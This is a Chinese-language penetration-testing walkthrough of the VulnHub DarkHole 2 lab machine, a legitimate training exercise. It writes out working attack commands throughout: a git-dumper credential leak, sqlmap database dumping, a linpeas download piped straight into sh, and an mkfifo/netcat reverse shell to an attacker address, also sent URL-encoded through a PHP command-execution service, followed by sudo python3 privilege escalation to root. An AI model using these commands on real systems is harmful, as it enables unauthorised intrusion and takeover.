vulnhub之darkhole2的實踐

今天實踐的是vulnhub的darkhole2鏡像，

下載地址，https://download.vulnhub.com/darkhole/darkhole_2.zip，

用workstation導入成功，地址掃描得到有效地址，

sudo netdiscover -r 192.168.58.0/24，

繼續做端口掃描，sudo nmap -sS -sV -T5 -A -p- 192.168.58.138，

瀏覽器訪問找到登錄入口，

瀏覽器訪問端口掃描到的git路徑，192.168.58.138:80/.git/，

用gitdumper對git目錄進行信息收集，

git clone https://github.com/arthaud/git-dumper.git，

cd git-dumper，mkdir backup，

python3 git_dumper.py http://192.168.58.138/.git/ backup，

cd backup，git log，

git diff a4d900a8d85e8938d3601f3cef113ee293028e10，

獲取到賬號密碼，lush@admin.com/321，

登錄之前找到的入口，猜測是sql注入點，

用burpsuite截取cookie信息，

把請求保存到本地sql文件，

用sqlmap進行爆破，sqlmap -r sql --dbs --batch，獲取到數據庫，

繼續對darkhole_2數據庫爆破，

sqlmap -r sql -D darkhole_2 --dump-all --batch，

獲取到賬號密碼，jehad/fool，

ssh登錄，ssh jehad@192.168.58.138，不是root，需要繼續提權，

下載linpeas.sh查找提權信息，cd /tmp，

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh，

獲取到losy用戶在本地9999端口開了php服務，

查看php服務文件發現提供了命令執行能力，

外面無法直接訪問，就通過ssh做一個通道，

ssh jehad@192.168.58.138 -L 9999:localhost:9999，

做一個反彈shell的命令，用burpsuite編碼，

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.58.131 8888 >/tmp/f，

在kali攻擊機上開一個nc監聽，nc -lvp 8888，

帶著反彈shell命令訪問php服務，

http://127.0.0.1:9999/?cmd=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%39%32%2e%31%36%38%2e%35%38%2e%31%33%31%20%38%38%38%38%20%3e%2f%74%6d%70%2f%66，

反彈shell就過來了，

轉成交互式shell，python3 -c 'import pty; pty.spawn("/bin/bash")'，

查看losy用戶home目錄，cd /home/losy，

cat .bash_history，獲取到賬號密碼，losy/gang，

sudo -l發現python3就有root權限，重新獲取shell，

sudo python3 -c 'import pty; pty.spawn("/bin/bash")'，確認是root，